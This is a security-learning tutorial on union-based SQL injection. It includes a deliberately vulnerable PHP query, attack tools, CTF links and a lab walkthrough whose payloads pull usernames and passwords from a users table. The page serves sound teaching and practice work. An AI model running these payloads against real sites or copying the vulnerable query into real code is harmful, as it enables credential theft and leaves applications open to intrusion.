Union Based Attacks

Introduction

Union-Based SQL Injection is a type of SQL injection attack that leverages the SQL UNION operator to combine the results of two or more SELECT queries into a single result set. This method can be used by attackers to extract data from a database by adding their own queries to the original query, which the application executes.

Table of Contents

How to identify

To identify Union-Based SQL Injection vulnerabilities, look for inputs that are used directly in SQL queries without proper sanitization. Typical indicators include:

  1. Unexpected Behavior: When inputting SQL syntax (like single quotes, double quotes, or UNION SELECT statements) causes unusual behavior in the application.

  2. Manual Testing: Try injecting UNION SELECT NULL and incrementally increase the number of NULL values until the number of columns matches the original query.

http://somewebsite.com/products.php?id=1 UNION SELECT NULL,NULL
  1. Sometimes you might be given the source code of the website with php in it. Here is an example of a vulnerable PHP code snippet:

<?php
$id = $_GET['id'];
$query = "SELECT name, price FROM products WHERE id = '$id'";
$result = mysqli_query($conn, $query);
?>

Code/tools/websites

Code Snippets

The UNION keyword lets you execute one or more additional SELECT queries and append the results to the original query. For example:

SELECT a, b FROM table1 UNION SELECT c, d FROM table2

We can use this to add additional queries to the one sent from the website.

Tools

  • SQLMap: An automated tool for SQL injection and database takeover.

  • Burp Suite: A web vulnerability scanner with tools for manual testing.

  • Havij: An automated SQL injection tool.

Websites

Zixem's 10 Challenges

https://ctflearn.com/challenge/149 (Hard)

Sample problem

Problem Statement

You are given access to a web application with a products category filter feature. The task is to identify if the application is vulnerable to Union-Based SQL Injection and extract all usernames and passwords in the database.

Link to lab

Solution

Click to reveal the solution

First and foremost, you can see that when you click on any of the categories, the URL of the page changes. This means that the page sends the category as params in the URL.

We can try to add random characters at the end of URL to see what happens; doing so gives us a internal server error, indicating that the param's value is directly being used in the code.

Knowing this we can now continue with our SQL injection.

  1. Determine the number of columns that are being returned by the query and which columns contain text data. Verify that the query is returning two columns, both of which contain text, using a payload like the following in the category parameter:

'+UNION+SELECT+'abc','def'--
  1. Use the following payload to retrieve the contents of the users table:

'+UNION+SELECT+username,+password+FROM+users--
  1. The list of passwords and usernames will be visible on the web page now.

Note: Zixen website has some great problems on this topic, consider doing them to hone your skill :)

References

Conclusion

Union-Based SQL Injection is a powerful technique for extracting data from vulnerable applications. Identifying such vulnerabilities requires understanding the behavior of SQL queries and using appropriate tools and manual testing methods. By practicing with tools like SQLMap and platforms like PortSwigger Web Security Academy, you can enhance your skills in exploiting and securing web applications against SQL injection attacks.

Last updated